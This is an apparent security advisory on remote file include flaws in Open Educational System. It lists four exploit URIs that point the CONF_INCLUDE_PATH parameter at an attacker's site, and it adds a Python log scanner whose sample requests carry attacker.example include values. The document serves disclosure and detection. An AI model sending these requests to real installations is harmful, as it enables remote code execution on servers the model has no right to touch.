Open Educational System 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/[path]/admin/modules/modules/forum/admin.php?CONF_INCLUDE_PATH=attacker's site
http://www.example.com/[path]/admin/modules/modules/plotgraph/index.php?CONF_INCLUDE_PATH=attacker's site
http://www.example.com/[path]/admin/modules/user_account/admin_user/mod_admuser.php?CONF_INCLUDE_PATH=attacker's site
http://www.example.com/[path]/admin/modules/user_account/ogroup/mod_group.php?CONF_INCLUDE_PATH=attacker's site
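
Requests of this shape are visible in web server access logs. The following is an added example, not part of the original advisory or of the Open Educational System code: it flags requests that pass CONF_INCLUDE_PATH in the query string, using the four script paths listed above. The log lines, the /oes install prefix, other.php and the severity labels are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Script paths from the advisory's example URIs; the install prefix varies.
AFFECTED = (
    "/admin/modules/modules/forum/admin.php",
    "/admin/modules/modules/plotgraph/index.php",
    "/admin/modules/user_account/admin_user/mod_admuser.php",
    "/admin/modules/user_account/ogroup/mod_group.php",
)
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)  # scheme://host or //host
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (documentation addresses, assumed /oes prefix).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2010:10:00:01 +0000] "GET /oes/index.php HTTP/1.1" 200 1043',
    '198.51.100.7 - - [12/Mar/2010:10:01:22 +0000] "GET /oes/admin/modules/modules/forum/admin.php?CONF_INCLUDE_PATH=http://attacker.example/ HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Mar/2010:10:01:25 +0000] "GET /oes/admin/modules/user_account/ogroup/mod_group.php?CONF_INCLUDE_PATH=http%3A%2F%2Fattacker.example%2F HTTP/1.1" 200 498',
    '203.0.113.5 - - [12/Mar/2010:10:02:40 +0000] "GET /oes/admin/other.php?conf_include_path=//attacker.example/ HTTP/1.1" 404 210',
    '192.0.2.10 - - [12/Mar/2010:10:03:11 +0000] "GET /oes/admin/modules/modules/plotgraph/index.php?CONF_INCLUDE_PATH=../include/ HTTP/1.1" 200 731',
]

def classify(line):
    """Return (client, path, severity) for a suspicious request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    # parse_qsl percent-decodes values, so an encoded scheme is still seen.
    # The name is compared case-insensitively to also catch probing variants.
    values = [v for k, v in parse_qsl(parts.query, keep_blank_values=True)
              if k.lower() == "conf_include_path"]
    if not values:
        return None
    known = parts.path.lower().endswith(AFFECTED)
    if any(REMOTE.match(v) for v in values):
        return client, parts.path, "high" if known else "medium"
    return client, parts.path, "low"  # parameter supplied, value not a remote URL

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for client, path, severity in scan(SAMPLE_LOG):
        print(f"{severity:6} {client:15} {path}")
```

Only query-string parameters appear in an access log, so a value sent in a POST body is not covered by this check.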


 

Copyright 2010, SecurityFocus